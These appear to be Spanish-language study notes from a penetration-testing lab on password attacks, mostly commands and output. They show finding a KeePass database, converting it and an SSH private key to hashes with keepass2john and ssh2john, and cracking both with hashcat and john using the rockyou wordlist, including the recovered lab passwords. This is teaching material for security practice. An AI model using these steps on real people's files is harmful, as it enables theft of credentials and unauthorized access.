Localizamos el archivo .kdbx de keepass desde windows
PS C:\\Users\\jason> Get-ChildItem -Path C:\\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\\Users\\jason\\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2022 8:19 AM 1982 Database.kdbx
Nos transferimos el archivo a nuestro linux, y con keepass2john convertimos a hash
kali@kali:~/passwordattacks$ keepass2john Database.kdbx > keepass.hash
kali@kali:~/passwordattacks$ cat keepass.hash
Database:$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1
Por último, le borramos la primera palabra (Database:) para dejar el hash limpio y se lo pasamos a john con el módulo 13400:
kali@kali:~/passwordattacks$ hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
hashcat (v6.2.5) starting
...
$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1:qwertyuiop123!
Con esa clave ya podemos acceder al gestor de contraseñas Keepass
En una situación como esta, que necesitemos la passphrase para identificarnos con una id_rsa por ssh, podemos crackearla
kali@kali:~/passwordattacks$chmod 600 id_rsa
kali@kali:~/passwordattacks$ssh -i id_rsa -p 2222 [email protected]
The authenticity of host '[192.168.50.201]:2222 ([192.168.50.201]:2222)' can't be established.
ED25519 key fingerprint is SHA256:ab7+Mzb+0/fX5yv1tIDQsW/55n333/oGARIluRonao4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])?yes
Warning: Permanently added '[192.168.50.201]:2222' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':Enter passphrase for key 'id_rsa':Enter passphrase for key 'id_rsa':
[email protected]'s password:
Le pasamos la herramienta ssh2john al hash
kali@kali:~/passwordattacks$ssh2john id_rsa > ssh.hash
kali@kali:~/passwordattacks$cat ssh.hash
id_rsa:$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000107059e78a8d3764ea1e883fcdf592feb7000000100000000100000197000000077373682...
Y con john o hashcat, procedemos a crackear el hash
kali@kali:~/passwordattacks$john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Umbrella137! (?)
1g 0:00:00:00 DONE (2022-05-30 11:19) 1.785g/s 32.14p/s 32.14c/s 32.14C/s Window137!..Umbrella137#
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Ahora ya tenemos la passphrase para autenticarnos con la id_rsa.